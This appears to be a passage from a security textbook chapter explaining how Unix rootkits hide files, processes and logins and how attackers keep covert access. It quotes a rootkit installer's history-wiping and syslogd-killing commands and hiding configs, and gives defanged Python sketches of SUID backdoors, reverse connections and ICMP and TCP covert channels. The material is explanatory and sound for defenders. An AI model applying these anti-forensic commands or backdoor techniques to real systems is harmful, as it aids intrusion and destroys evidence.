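MAGIC="vt9000"
login_check() {
    if [ "$TERM" = "$MAGIC" ]; then
        echo backdoor        # real kit: exec a root shell, skipping authentication
    else
        echo normal          # real kit: exec the saved original /bin/login
    fi
}
TERM="$MAGIC"; first=$(login_check)
TERM="vt100";  second=$(login_check)
```

Because the trigger rides in an environment variable the remote user controls, the backdoor works over an ordinary telnet connection without any unusual network traffic.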

The level of rootkit sophistication has grown over the years. More and more binaries have been subverted by attackers and included in rootkits. Local backdoors, such as “root on demand,” have been placed in many otherwise innocuous programs. Any program that runs SUID root can be turned into a local backdoor that provides root access. For example, a backdoored ping utility is often seen in Linux rootkits. In fact, one rootkit author sincerely apologizes in the kit’s README file for not including top (a program to show running processes) in the previous version and for delaying the release of this popular “customer-requested” feature.
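The shape of such a local backdoor can be sketched as follows. The trigger flag is hypothetical, and the privileged step is only indicated in a comment, since it would require an actual SUID-root binary:

```python
def backdoor_triggered(argv):
    """A backdoored SUID binary behaves normally unless a covert
    trigger appears on its command line."""
    return "--rewt" in argv              # hypothetical trigger flag

def run(argv):
    if backdoor_triggered(argv):
        # A real backdoor in a SUID-root binary would do the
        # equivalent of setuid(0) followed by exec("/bin/sh") here.
        return "root shell"
    return "normal ping output"

normal = run(["ping", "-c", "1", "localhost"])
evil = run(["ping", "--rewt"])
```

Because the binary behaves identically to the original for every normal invocation, only an integrity check of the file itself reveals the modification.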

A lot of development went into creating better and more user-friendly (should we say hacker-friendly?) installation scripts. Colors, menus, and automated OS version detection and configuration began showing up in kits as they matured through the late 1990s. Installation scripts became able to automatically clean logs, look for dangerous configuration options (like enabled remote logging), seek and destroy competing rootkits (ironically, by borrowing components from the antirootkit tool, chkrootkit, from http://www.chkrootkit.org), and perform decent system hardening, complete with plugging the hole used to attack the system. One of the rootkits refers to “unsupported” versions of RedHat Linux and offers limited email installation support for the kit itself.

Another area where great progress has occurred is in rootkit stealth properties. Kernel-level or LKM (Loadable Kernel Module) kits rule in this area. Unlike regular kits that replace system files, LKM kits (publicly available for Linux, Free/OpenBSD, and Solaris) hook into the system kernel and replace (remap) or modify (intercept) some of the kernel calls. In this case, the very core of the operating system becomes untrusted. Consequently, all of the system components that use the corrupted kernel call can fool both the user and whatever security software is installed.

Rootkits have also increased in size due to the amazing wealth of bundled tools, such as attack scanners. Typical rootkit tools are reviewed in the following sections.

Hiding

Let’s analyze how rootkits accomplish the goal of hiding your tracks. First, the rootkit hides its own presence, the presence of other intruders’ files, and evidence of access. Here is an excerpt from a recent Linux rootkit installation file:

unset HISTFILE
unset HISTSAVE
export HISTFILE=/dev/null
...
killall -9 syslogd
chattr +i /root/.bash_history
...

The kit attacks shell history in two ways. First, it unsets the history-related environment variables and points HISTFILE at /dev/null, which stops history recording for the current session. Second, via chattr +i, it marks root’s existing saved history file “immutable”—that is, not modifiable by any program on the system, even one running as root. In addition, the kit warns about remote logging and suggests that its user “go hack the syslog aggregation box”—a feat that might well be beyond the ability of an average script kiddie.

The kit referenced above did not perform automated log cleaning; instead, it included the appropriate tools and some tips on how to use them. Killing syslogd outright seems likely to draw attention, but further into the installation script a “new” (i.e., Trojaned) version of the syslogd software is deployed and executed. This version ignores configured IP addresses, processes, and users: any message containing one of them is never recorded. For example, if user “evil” logs in via FTP, none of her FTP accesses are logged, provided the malicious syslogd was configured to hide her. Likewise, if any user connects from 166.61.66.61 (the evil IP address), nothing is logged.
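The filtering behavior of such a Trojaned syslogd can be sketched as a simple message filter. The user and IP values are taken from the example above; the function and variable names are invented for illustration:

```python
# Hypothetical filter lists, mirroring how a Trojaned syslogd is configured
HIDDEN_USERS = {"evil"}
HIDDEN_IPS = {"166.61.66.61"}

def should_log(message: str) -> bool:
    """Drop any message mentioning a protected user or IP address;
    everything else is written to the logs as usual."""
    for token in HIDDEN_USERS | HIDDEN_IPS:
        if token in message:
            return False
    return True

visible = [m for m in [
    "ftpd: login from 10.1.2.3 user alice",
    "ftpd: login from 166.61.66.61 user evil",
] if should_log(m)]
```

From the administrator’s point of view the daemon looks and behaves like stock syslogd; only the attacker’s own activity silently vanishes from the record.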

Rootkits often take measures to hide their own files and other attackers’ files. The oldest trick in the book is for the rootkit to obscure its own location on the disk. Even expert system administrators might not look at the entire disk every day. However, understanding the functionality of every piece of your system clearly helps to avoid some surprises. In general, only integrity checking software (such as Tripwire) can find these malicious files. Unfortunately, there are tricks that kernel rootkits play that can even defeat them.

Here are some of the locations used by the kits:

/dev/.hdd
/etc/rc.d/arch/alpha/lib/.lib
/usr/src/.poop
/usr/lib/.egcs
/dev/.lib
/usr/src/linux/arch/alpha/lib/.lib/.1proc
/usr/src/.puta
/usr/info/.t0rn
/etc/rc.d/rsha

There are many others. In fact, it is just too easy to change the default location. The above list demonstrates the pattern of thinking manifested by rootkit authors: hiding files in /etc (where they might look like system files of unclear purpose), rarely used locations (such as /usr/src or /usr/info), or /dev (where no user-utilized programs reside).

Here is an excerpt from a rootkit configuration file that shows the parameters used for hiding, apparently based on K2’s Universal Root Kit (URK):

[file]
file_filters=rookit,evilfile1
[ps]
ps_filters=nedit,bash
[netstat]
net_filters=hackersrus.ro

The rootkit components refer to the above file and hide the referenced files, processes, and connections from standard Unix binary tools. URK is an old, multiplatform kit that replaces several system binaries with Trojaned versions.
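A sketch of how a kit might consume such a configuration file and apply it to ps output follows; the parsing and filtering code is illustrative, not URK’s actual implementation:

```python
import configparser

CONFIG = """\
[file]
file_filters=rookit,evilfile1
[ps]
ps_filters=nedit,bash
[netstat]
net_filters=hackersrus.ro
"""

def load_filters(text):
    """Each section of the config holds one comma-separated filter list."""
    cp = configparser.ConfigParser()
    cp.read_string(text)
    return {sec: next(iter(cp[sec].values())).split(",")
            for sec in cp.sections()}

def filtered_ps(lines, filters):
    """Drop any process line mentioning a filtered name, as a Trojaned
    /bin/ps would before printing its output."""
    return [l for l in lines if not any(f in l for f in filters["ps"])]

filters = load_filters(CONFIG)
visible = filtered_ps(["  101 ?  sshd", "  202 ?  nedit"], filters)
```

The same lookup would be applied by the Trojaned ls and netstat against their respective sections.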

LKM kits take the art of hiding to the next level. Using the loadable kernel module (a piece of software injected into a running Unix kernel), the kits are able to achieve near-total control over the system. See Section 10.5 for the analysis of the well-known LKM kit Knark.

Library Trojan kits, of which Torn 8 is the most famous representative, use a somewhat different method to elude detection. They add a special system library (called libproc.so by default) that is loaded before other system libraries. The library has copies of many library calls that are redirected in a manner similar to the kernel module. It’s the user-space equivalent of kernel module-based redirection.

However scary this LKM rootkit technology might be, it is not on the bleeding edge of system hiding. Simply disabling the loading of modules within the Unix/Linux kernel can defeat most LKM kits; it’s usually a compile-time option for open source Unix variants. Silvio Cesare, in his paper “runtime-kernel-kmem-patching.txt,” showed that loadable modules are not required for intruding upon the Unix kernel. Several kits have since turned this research advance into production code. For example, SucKit is a user-friendly package that installs in the kernel and allows covert remote login, all without the need to insert any modules. The technique invented by Silvio Cesare works for both the 2.2 and 2.4 kernels.

Rootkits also help attackers regain ground if the system administrator locates and removes part of their tools. No matter how often it is advised that a compromised system be rebuilt, real life dictates otherwise. And while a rootkit might make the system more difficult to hack from the outside, the kits often “weaken” the Unix system from the inside. Thus, if an attacker loses ground but even a little CGI-based backdoor remains, all is not lost and “root” can be regained.

Other items commonly seen in rootkits assist with the game of hide-and-seek on the compromised system. For instance, multiple Trojaned binaries allow attackers to regain root control even if the main method (such as a login Trojan with a magic password) is located and eliminated. Similarly, a seemingly innocuous ping (often SUID root) can hide a five-line code modification that spawns a root shell.

Hiding becomes complicated if some other “guest” is hiding on the same system as well. Some rootkits contain advanced antirootkit tools that can seek and destroy other kits, DDoS zombies, or worms that have previously taken over the system.

Hidden Access

It’s also important for an attacker to covertly access the compromised system. Let us review some of the methods attackers use for this purpose, listed approximately from least to most covert:

Telnet, shell on high port

The first method is simply connecting to a system via telnet or the old inetd backdoor (a shell bound to a high port on a system). This option isn’t covert at all; it’s easily detected, and we only mention it for reference. The high-port shell hides you only from the most entry-level Unix administrators; its sole advantage is that, unlike stock telnet, the connection leaves no records in the system logs. This backdoor dates back to the 1980s, and maybe even earlier.

ssh (regular, Trojaned, and on high port)

ssh is the tool of choice for amateur attackers. Deploying a second ssh daemon running on a high port (such as 812 or 1056 TCP) on a compromised machine is the modus operandi of many script kiddies. This method provides several advantages over using telnet, since communication is encrypted and suspicious commands cannot be picked up by network IDSs. Such custom daemons also will not leave evidence in logfiles upon connecting. However, both ssh and telnet show up in response to the netstat command (provided that it is not Trojaned). This technique becomes more effective under the cover of Trojaned binaries or kernel rootkits that hide the connection from the sysadmin.

UDP listener

UDP services are more difficult to port scan than TCP services and are usually less likely to be found. If a backdoor listens on a UDP port, there is less chance that it will be discovered. Obviously, the listening program itself might be found on the host, but with traffic as sparse as one packet per minute, the communication (unlike a TCP session) is unlikely to be noticed on the network. As with TCP, it makes sense to Trojan netstat and other tools that might reveal the presence of the backdoor.
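A minimal local sketch of the idea, using Python sockets purely for illustration (the magic payload is invented, and both ends run on loopback with an OS-assigned port; a real backdoor would obviously not bind to localhost):

```python
import socket
import threading

MAGIC = b"knock"  # hypothetical trigger payload

def serve_once(sock):
    """Wait for a single datagram and act only if it carries the
    magic payload; anything else is silently ignored."""
    data, addr = sock.recvfrom(1024)
    return "command accepted" if data == MAGIC else "ignored"

# Bind a UDP socket, send one datagram at it, observe the decision.
srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
srv.bind(("127.0.0.1", 0))           # port 0: let the OS pick a free port
port = srv.getsockname()[1]
result = []
t = threading.Thread(target=lambda: result.append(serve_once(srv)))
t.start()
cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
cli.sendto(MAGIC, ("127.0.0.1", port))
t.join()
srv.close()
cli.close()
```

Because UDP is connectionless, a single well-spaced datagram is all the traffic the channel ever generates.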

Reverse shell/telnet

A backdoor that opens a connection from the target to the attacker’s machine is better than a regular connection, since the target does not acquire any new open ports that inbound-connection defenses—such as a personal firewall or host-based ACL (Access Control List) protection—could block. The connection can also be encrypted and thus shielded from a network IDS. However, many people find it unusual when their servers start initiating connections to outside machines, and some outbound connections may be blocked at the border firewall. The attacker’s machine should run something like netcat (nc) to listen for the inbound connection.
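The call-back pattern can be illustrated in a few lines of Python. For safety, this sketch only sends a banner over the outbound connection instead of wiring it to a shell, and both ends run on loopback:

```python
import socket
import threading

def reverse_connect(attacker_host, attacker_port):
    """The compromised host dials OUT to the attacker, so no new
    listening port appears on the target. A real backdoor would attach
    this socket to a shell; here we only send a banner."""
    s = socket.socket()
    s.connect((attacker_host, attacker_port))
    s.sendall(b"shell ready\n")
    s.close()

# Attacker side: the equivalent of `nc -l`, waiting for the callback.
listener = socket.socket()
listener.bind(("127.0.0.1", 0))      # OS-assigned port for the example
listener.listen(1)
port = listener.getsockname()[1]
threading.Thread(target=reverse_connect, args=("127.0.0.1", port)).start()
conn, _ = listener.accept()
banner = conn.recv(64)
conn.close()
listener.close()
```

Note the role reversal: the “server” side of the TCP connection is the attacker’s listener, while the victim is merely an outbound client.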

ICMP telnet

There is a saying that you can tunnel anything over anything else, and “ICMP telnet” (implemented, for example, by the Loki tool) is a prime example. ICMP control messages such as Echo Request and Echo Reply (commonly used to test network connectivity) can be made to carry payloads such as command-line sessions. Many types of ICMP messages are allowed through firewalls for network performance reasons; where they are blocked, the communication (e.g., a regular ping) can instead be initiated from inside the protected perimeter. Such backdoors do not show up in netstat and cannot be uncovered by port scanning the target machine. However, network IDSs can pick up the unusual patterns in ICMP communication caused by existing ICMP backdoors.
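To illustrate how a payload rides inside an Echo Request, here is a sketch that only constructs the ICMP bytes (type 8, code 0, per the RFC 792 layout); actually sending them would require a raw socket and root privileges. The checksum routine is the standard Internet checksum:

```python
import struct

def icmp_checksum(data: bytes) -> int:
    """Standard Internet checksum (RFC 1071) over the ICMP message."""
    if len(data) % 2:
        data += b"\x00"                        # pad odd-length messages
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    total = (total >> 16) + (total & 0xFFFF)   # fold carries
    total += total >> 16
    return ~total & 0xFFFF

def echo_request(ident: int, seq: int, payload: bytes) -> bytes:
    """Build an ICMP Echo Request whose data field smuggles an
    arbitrary payload, Loki-style."""
    header = struct.pack("!BBHHH", 8, 0, 0, ident, seq)  # checksum = 0
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", 8, 0, csum, ident, seq) + payload

pkt = echo_request(0x1234, 1, b"cat /etc/passwd")
```

To a casual observer the packet is an ordinary ping; only inspection of the data field (which ping normally fills with a fixed pattern) reveals the command inside.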

Reverse tunneled shell

This method helps when outbound connections are blocked. In most environments, web browsing (access to outside machines on port 80 TCP) is allowed and often unrestricted. A remote HTTP shell imitates a connection from a browser (inside the protected perimeter) to a web server (outside). The connection itself is fully compliant with the HTTP protocol used for web browsing; on the outside, software that interprets the “HTTP-encoded” command session plays the part of the web server. For example, a simple and innocuous GET command (normally used to retrieve web pages) might be used to retrieve special files, with the requested filename carrying several bytes of communication from client (inside) to server (outside): “GET o.html”, then “GET v.html”, then “GET e.html”, then “GET r.html” transmits the word “over”. A real encoding algorithm would be much more elaborate. Such a backdoor is unlikely to be detected. For higher stealth, the backdoor engine can be activated by a “magic” packet or by a timer.
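The filename-per-character scheme described above can be sketched directly. The encode/decode pair is illustrative, not taken from any real tool:

```python
def encode(word: str):
    """Leak a word one character per request: each letter becomes an
    innocuous-looking page fetch."""
    return ["GET %s.html" % ch for ch in word]

def decode(requests):
    """The attacker's fake web server reassembles the message from
    the requested filenames."""
    return "".join(r[len("GET "):-len(".html")] for r in requests)

msgs = encode("over")
# msgs == ["GET o.html", "GET v.html", "GET e.html", "GET r.html"]
```

A production-grade channel would pack more bits per request (into paths, query strings, cookies, or request timing), but the principle is the same.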

“Magic” packet-activated backdoor

This is a mix of reverse shells and regular direct connect backdoors. The backdoor opens a port or initiates a session from the target upon receiving a specific packet, such as a TCP packet with a specific sequence number or with other inconspicuous parameters set.
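The trigger test itself is trivial; the magic value below is invented for illustration, and a real implementation would inspect raw packet headers rather than plain integers:

```python
MAGIC_SEQ = 0x5EED1E55  # hypothetical hardcoded trigger value

def is_trigger(tcp_seq: int) -> bool:
    """React only to a packet whose TCP sequence number matches the
    magic value; all other traffic is ignored, so a port scan of the
    dormant backdoor finds nothing."""
    return tcp_seq == MAGIC_SEQ

actions = ["open shell" if is_trigger(seq) else "ignore"
           for seq in (0x12345678, MAGIC_SEQ, 0)]
```

Because a sequence number is expected to be random anyway, the magic packet is statistically indistinguishable from normal traffic to anyone who does not know the value.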

No-listener (sniffer-based) backdoor

This method of hidden communication provides a high degree of stealth and includes deception capabilities. The backdoor does not open a port on the local machine, but starts sniffing network traffic instead. Upon receiving a specific packet—not even aimed at the backdoored machine, merely visible to it (i.e., on the same subnet)—it executes an action and sends a response. The response is sent using a spoofed (i.e., faked) source IP address, so the communication cannot be traced back to the target; only a sensor on the same LAN as the victim, observing layer II (MAC hardware) addresses, can link the reply to its real source. These backdoors are just starting to pop up in rootkits. In some sense, such a backdoor is easier to detect from the host side, since it has to shift the network interface into promiscuous mode. However, this weakness is compensated for by the increased difficulty of detection from the network side, since packets are not associated with the backdoored machine.

Covert channel backdoor

A full-blown covert channel (in the sense defined in the Department of Defense’s “Light Pink Book” from the Rainbow Series)[5] can be mathematically proven undetectable. If you design your own signaling system and then overlay it upon an otherwise innocuous network protocol, it will probably never be detected: the number of fields that can be varied in network- and application-layer protocols is simply too high to account for. For example, what if the TCP initial sequence number is not quite random but carries a pattern? What if the web server slightly changes the formatting of a web page to send a byte or two out? The possibilities are endless.
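As an illustration of the sequence-number idea, here is a sketch that hides one byte per connection in the low bits of an otherwise random-looking TCP initial sequence number. The bit allocation (24 random bits, 8 payload bits) is an arbitrary choice for the example:

```python
import random

def isn_with_byte(b: int) -> int:
    """Hide one byte in the low 8 bits of a 32-bit initial sequence
    number; the upper 24 bits stay random to preserve appearances."""
    return (random.getrandbits(24) << 8) | (b & 0xFF)

def byte_from_isn(isn: int) -> int:
    """The receiver simply masks off the low byte."""
    return isn & 0xFF

def send_word(word: str):
    # One "connection attempt" (ISN) per character of the message.
    return [isn_with_byte(ord(c)) for c in word]

def recv_word(isns):
    return "".join(chr(byte_from_isn(i)) for i in isns)
```

An observer who does not know the scheme sees only ordinary-looking connection attempts; detecting the channel would require statistical analysis of the low bits across many ISNs.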

The above list demonstrates that even though hiding on a network is complicated, there are many tricks that interested parties can employ to keep their presence hidden, even under intrusion detection systems. However, the more tightly controlled the network is, the less likely it is that a covert channel will sneak through.

References



[1] Here, the definition of a covert channel does not stem from the classic definition from the “Light Pink Book” of the Rainbow Series, but simply covers any hidden method of communicating with a compromised system.

[2] Reasonably sure implies that the level of effort you apply to hiding exceeds the effort (and investment) the investigators are willing and able to make to find you.

[3] For information on LinLogFS, see http://www.complang.tuwien.ac.at/czezatke/lfs.html.

[4] A site used for tool retrieval and not for any other purpose. The term originates in the world of espionage; a spy leaves various artifacts for other spies to pick up in a dead drop box.

[5] NCSC-TG-030 [Light Pink Book] “A Guide to Understanding Covert Channel Analysis of Trusted Systems” (11/93), available at http://www.fas.org/irp/nsa/rainbow/tg030.htm.
